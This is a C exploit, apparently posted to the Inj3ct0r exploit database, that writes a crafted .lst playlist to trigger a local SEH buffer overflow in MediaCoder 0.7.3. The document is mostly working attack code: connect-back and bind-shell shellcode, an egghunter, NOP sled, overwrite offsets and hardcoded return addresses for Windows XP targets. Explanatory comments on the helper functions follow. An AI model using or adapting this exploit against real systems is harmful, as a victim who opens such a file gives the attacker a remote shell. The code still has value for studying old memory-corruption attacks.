==================================================== MediaCoder (.lst) file local Buffer Overflow Exploit ====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ####################################### 1 0 I'm fl0 fl0w member from Inj3ct0r Team 1 1 ####################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Discovered By: fl0 fl0w [+] My id: http://inj3ct0r.com/author/1125
#include<stdio.h> #include<getopt.h> #include<string.h> #include<windows.h>
#define PAUSE() getchar() #define R return #define V void #define CONST const #define STATIC static #define SIZE(a) strlen(a) #define FOR(i,a,b) for(i=a;i<b;++i) #define IFeq(a,b) if(a==b) #define IFless(a,b) if(a<b) #define IFgreat(a,b) if(a>b) #define IFnot(a) if(!a) #define fisier FILE #define nul NULL #define SPLIT(a) exit(a) #define VER "0.7.3 build 4612 PSP edition" #define POCNAME "MediaCoder .lst file local buffer overflow exploit" #define AUTHOR "fl0 fl0w" #define IFn(a,b) if(a!=b) #define String_lengh 0x2FC #define EIP_OFFSET 0x300 #define NOP_OFFSET 0x304 #define EGGHUNTER_OFFSET 0x318 #define JUNK_OFFSET 0x34A #define TAG_OFFSET 0x81C #define SHELL_OFFSET 0x824 #define NSEH_OFFSET 0x2FC #define STOP break #define NOP "\x90\x90\x90\x90\x90" \ "\x90\x90\x90\x90\x90" \ "\x90\x90\x90\x90\x90" \ "\x90\x90\x90\x90\x90" typedef char i8; typedef short i16; typedef int i32; enum {True=1,False=0,Error=-1}; size_t len(const i8*); i32 fwt(CONST V*,i32,i32,fisier*); i32 mcpy(V*,CONST V*,i32); i32 mset(V*,i32,i32); i32 prinf(fisier*,CONST i8*,i8*); i32 strcp(CONST i8*,CONST i8*); V print(i8*); DWORD getFsize(fisier*,i8*); V gen_random(i8*,CONST i32); DWORD SearchStream(CONST i8*,size_t,CONST i8*,size_t); DWORD Findpopopret(V); i32 stncmp(CONST i8*,CONST i8*,i32); V help(); i32 closef(fisier*); fisier* openf(CONST i8*,CONST i8*,fisier*); char BeeP[]={ "\x55\x89\xE5\x83\xEC\x18\xC7\x45\xFC" "\x6F\x7A\x83\x7C" "\xC7\x44\x24\x04\xD0\x07\x00\x00\xC7\x04\x24" "\x01\x0E\x00\x00\x8B\x45\xFC\xFF\xD0\xC9\xC3" }; char ConnectBack[]={ /*ConnectBack 127.0.0.1 port 2010*/ "\x31\xc9\xbd\xcb\xe3\xbf\xf7\xb1\x4f\xd9\xc8\xd9\x74\x24\xf4" "\x5f\x31\x6f\x10\x83\xc7\x04\x03\x6f\x0c\x29\x16\x43\x1f\x24" "\xd9\xbc\xe0\x56\x53\x59\xd1\x44\x07\x29\x40\x58\x43\x7f\x69" "\x13\x01\x94\xfa\x51\x8e\x9b\x4b\xdf\xe8\x92\x4c\xee\x34\x78" "\x8e\x71\xc9\x83\xc3\x51\xf0\x4b\x16\x90\x35\xb1\xd9\xc0\xee" "\xbd\x48\xf4\x9b\x80\x50\xf5\x4b\x8f\xe9\x8d\xee\x50\x9d\x27" 
"\xf0\x80\x0e\x3c\xba\x38\x24\x1a\x1b\x38\xe9\x79\x67\x73\x86" "\x49\x13\x82\x4e\x80\xdc\xb4\xae\x4e\xe3\x78\x23\x8f\x23\xbe" "\xdc\xfa\x5f\xbc\x61\xfc\x9b\xbe\xbd\x89\x39\x18\x35\x29\x9a" "\x98\x9a\xaf\x69\x96\x57\xa4\x36\xbb\x66\x69\x4d\xc7\xe3\x8c" "\x82\x41\xb7\xaa\x06\x09\x63\xd3\x1f\xf7\xc2\xec\x40\x5f\xba" "\x48\x0a\x72\xaf\xea\x51\x1b\x1c\xc0\x69\xdb\x0a\x53\x19\xe9" "\x95\xcf\xb5\x41\x5d\xc9\x42\xa5\x74\xad\xdd\x58\x77\xcd\xf4" "\x9e\x23\x9d\x6e\x36\x4c\x76\x6f\xb7\x99\xd8\x3f\x17\x72\x98" "\xef\xd7\x22\x70\xfa\xd7\x1d\x60\x05\x32\x28\xa7\x92\xc2\x2b" "\x27\x62\x55\x2e\x27\x63\x7f\xa7\xc1\x01\x6f\xee\x5a\xbe\x16" "\xab\x10\x5f\xd6\x61\xb0\xfc\x45\xee\x40\x8a\x75\xb9\x17\xdb" "\x48\xb0\xfd\xf1\xf3\x6a\xe3\x0b\x65\x54\xa7\xd7\x56\x5b\x26" "\x95\xe3\x7f\x38\x63\xeb\x3b\x6c\x3b\xba\x95\xda\xfd\x14\x54" "\xb4\x57\xca\x3e\x50\x21\x20\x81\x26\x2e\x6d\x77\xc6\x9f\xd8" "\xce\xf9\x10\x8d\xc6\x82\x4c\x2d\x28\x59\xd5\x5d\x63\xc3\x7c" "\xf6\x2a\x96\x3c\x9b\xcc\x4d\x02\xa2\x4e\x67\xfb\x51\x4e\x02" "\xfe\x1e\xc8\xff\x72\x0e\xbd\xff\x21\x2f\x94" }; char Bindport1122[]={ "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48" "\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x37" "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48" "\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48" "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x33\x46\x45\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48" "\x4f\x55\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x44" 
"\x4b\x58\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" "\x49\x38\x4e\x36\x46\x52\x4e\x41\x41\x56\x43\x4c\x41\x33\x4b\x4d" "\x46\x56\x4b\x38\x43\x34\x42\x53\x4b\x38\x42\x44\x4e\x30\x4b\x48" "\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x34\x4a\x30\x50\x45\x4a\x46" "\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56" "\x43\x55\x48\x36\x4a\x36\x43\x33\x44\x33\x4a\x46\x47\x57\x43\x57" "\x44\x43\x4f\x45\x46\x35\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e" "\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e" "\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x56\x44\x30" "\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" "\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x45\x43\x35\x43\x35\x43\x44" "\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x46\x50" "\x44\x36\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x49\x4a\x36\x46\x4a" "\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" "\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d" "\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x55\x4f\x4f\x48\x4d" "\x42\x55\x46\x35\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46" "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x35" "\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x56" "\x4d\x36\x49\x38\x45\x4e\x4c\x36\x42\x35\x49\x45\x49\x32\x4e\x4c" "\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c" "\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x54\x4e\x52" "\x43\x39\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56" "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f" "\x48\x4d\x4b\x45\x47\x55\x44\x45\x41\x45\x41\x35\x41\x45\x4c\x56" "\x41\x50\x41\x45\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x36" "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36" "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f" 
"\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" "\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a" }; i8 Calculator[]={ "\xba\x20\xf0\xfd\x7f\xc7\x02\x4c\xaa\xf8\x77\x33\xC0\x50\x68\x63\x61\x6C\x63" "\x54\x5B\x50\x53\xB9\xC7\x93\xC2\x77\xFF\xD1\xEB\xF7" }; i8 egghunter[]={/*IsBadReadPtr egghunter 32 bytes*/ "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" "\x66\x6C\x30\x77" //fl0w tag "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7" }; i8 tag[]={"\x66\x6C\x30\x77" "\x66\x6C\x30\x77" }; i32 j,i,x,custom=0,err; i8 c,shellbuffer[0x3E8],fbuffer[0xF4240],retcode[10]; DWORD ret; i32 main(i32 argc,i8** argv) { ((argc==7)||(argc==8)&&(atoi(argv[4])>0)&&(atoi(argv[6])>0)&&(atoi(argv[4])<6)||(argc==8)&&(atoi(argv[7])==4))?(err=True):(err=Error); IFeq(err,True){ ((strcp(argv[1],"-f")==0)&&(len(argv[1])==2)&&(strcp(argv[3],"-s")==0)&&(len(argv[3])==2)&&(strcp(argv[5],"-t")==0)&&(len(argv[5])==2))?(err=True):(err=Error); IFeq(err,True){ (atoi(argv[6])==1)?(mcpy(&ret,"\x26\x59\x01\x66",4)):(atoi(argv[6])==2)?(mcpy(&ret,"\xB8\x15\xD1\x72",4)):(atoi(argv[6])==3)?(mcpy(&ret,"\x83\x27\x90\x7C",4)):(atoi(argv[6])==4)?(custom=1):(custom=0); IFeq(custom,1){ if((strncmp(argv[7],"0x",(sizeof(i8)*2))==0)&&(len(argv[7])==10)){ for(j=(sizeof(char) * 8) - 1; (j >= 0);j--) { c = *(argv[1] + j + 2); ((c>=48)&&(c<=57)||(c>=65)&&(c<=70)||(c>=97)&&(c<=102))?(err=1):(err=-1); } sscanf(argv[7],"%x",&ret); } else print("syntax error 0x not found"); } } else print("syntax error ,target must be in range[1-4]"); } else { system("cls"); printf("[#]%s\n[#]Ver %s\n[#]Author %s\n",POCNAME,VER,AUTHOR); help(); } switch(atoi(argv[4])){ case 1: mcpy(shellbuffer,ConnectBack,SIZE(ConnectBack)); STOP; case 2: mcpy(shellbuffer,Bindport1122,0x2C5); STOP; case 3: mcpy(shellbuffer,Calculator,0x20); STOP; case 4: mcpy(shellbuffer,BeeP,0x13); STOP; } gen_random(fbuffer,String_lengh); mcpy(fbuffer+NSEH_OFFSET,"\xEB\x06\x90\x90",4); 
mcpy(fbuffer+EIP_OFFSET,&ret,4); mcpy(fbuffer+NOP_OFFSET,NOP,0x14); mcpy(fbuffer+EGGHUNTER_OFFSET,egghunter,0x20); mset(fbuffer+JUNK_OFFSET,0x58,0x4D2); mcpy(fbuffer+TAG_OFFSET,tag,8); mcpy(fbuffer+SHELL_OFFSET,shellbuffer,len(shellbuffer));
fisier* f=fopen(argv[2],"wb"); fwt(fbuffer,1,0x824+len(shellbuffer),f); closef(f); PAUSE(); print("DONE!"); printf("[!]File is %d bytes",getFsize(f,argv[2])); R 0; }
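/*
 * Thin wrappers around the C library used by main() above.  Most simply
 * forward their arguments; the ones whose behaviour is not obvious from
 * their name (mcpy, gen_random, getFsize) are documented in place.
 */

/* Length of the NUL-terminated string str (plain strlen). */
size_t len(const char *str)
{
    return strlen(str);
}

/* fwrite() forwarded unchanged: writes elem objects of sz bytes each from
 * ptr to fname.  Returns the number of objects written, which can be
 * smaller than elem on a short write -- callers should compare. */
int fwt(const void *ptr, int sz, int elem, FILE *fname)
{
    return (int)fwrite(ptr, (size_t)sz, (size_t)elem, fname);
}

/* Copies bytes from source to dest and returns the number of bytes copied.
 *
 * NOTE: the `len` argument is not used as the copy length.  The length is
 * taken from strlen(source), so the copy stops at the first NUL byte of
 * source and reads past source when it carries no terminator.  Honouring
 * `len` would change what the existing call sites write, so this is left
 * as found; callers that need an exact byte count should use memcpy()
 * directly.  (`len` also shadows the len() function above in this body.) */
int mcpy(void *dest, const void *source, int len)
{
    len = (int)strlen(source);
    memcpy(dest, source, (size_t)len);
    return len;
}

/* memset() forwarded unchanged: fills len bytes at ptr with val; returns len. */
int mset(void *ptr, int val, int len)
{
    memset(ptr, val, (size_t)len);
    return len;
}

/* fprintf(str, format, buffer).  `format` is passed through verbatim as the
 * format string, so it must be a trusted literal, never data read from a
 * file or the command line (CERT FIO30-C). */
int prinf(FILE *str, const char *format, char *buffer)
{
    return fprintf(str, format, buffer);
}

/* strcmp() forwarded unchanged: <0, 0 or >0 like the library call. */
int strcp(const char *str1, const char *str2)
{
    return strcmp(str1, str2);
}

/* strncmp() forwarded unchanged: compares at most num bytes. */
int stncmp(const char *str1, const char *str2, int num)
{
    return strncmp(str1, str2, (size_t)num);
}

/* Prints msg as a "[*]" status line on stdout. */
void print(char *msg)
{
    printf("[*]%s\n", msg);
}

/* Fills s[0..len-1] with characters from alphanum and NUL-terminates at
 * s[len]; s must therefore hold at least len + 1 bytes.  Uses rand()
 * without any srand() call in this file, so the sequence produced is the
 * same on every run. */
void gen_random(char *s, const int len)
{
    static const char alphanum[] =
        "0123456789ABCDEFGHIJKLMNOPQRST"
        "UVWXYZabcdefghijklmnopqrstuvwxyz";
    /* sizeof includes the terminating NUL, hence the -1. */
    for (int i = 0; i < len; ++i) {
        s[i] = alphanum[rand() % (sizeof(alphanum) - 1)];
    }
    s[len] = 0;
}

/* Prints the command-line usage banner. */
void help(void)
{
    static const char h[] =
        "***************************************************************************\n"
        "* syntax: [-f<file.m3u>] [-s<shellcode>] [-t<target>] 0xFFFFFFFF *\n"
        "* -f filename *\n"
        "* -s shellcode to run [1,5] *\n"
        "* -t target [1,4] *\n"
        "* example: mediac.exe -f vuln.lst -s 2 -t 1 *\n"
        "* mediac.exe -f vuln.lst -s 4 0xFFFFFFFF *\n"
        "* Shellcode 1.ConnectBack 127.0.0.1 port 2010 *\n"
        "* 2.Bindport1122 *\n"
        "* 3.Calculator *\n"
        "* 4.BeeP *\n"
        "* Targets 1.Universal *\n"
        "* 2.Windows xp sp2 en kernel32.dll *\n"
        "* 3.Windows sp3 en ntdll.dll *\n"
        "* 4.Windows xp sp1 en *\n"
        "***************************************************************************\n";
    printf("%s", h);
}

/* Returns the size in bytes of the file named gname.
 *
 * The stream argument g is not used as input: it is overwritten by a fresh
 * fopen() of gname (main() passes a stream it has already closed).  If the
 * file cannot be opened a message is printed and the process exits.  The
 * stream opened here is closed before returning so no handle is leaked.
 * ftell() reports -1 on failure; that value is returned converted to DWORD. */
DWORD getFsize(FILE *g, char *gname)
{
    g = fopen(gname, "rb");
    if (g == NULL) {
        print("File error at reading");
        exit(0);
    }
    fseek(g, 0, SEEK_END);
    DWORD s = (DWORD)ftell(g);
    fclose(g);
    return s;
}

/* fclose() forwarded unchanged; returns 0 on success, EOF on failure. */
int closef(FILE *stream)
{
    return fclose(stream);
}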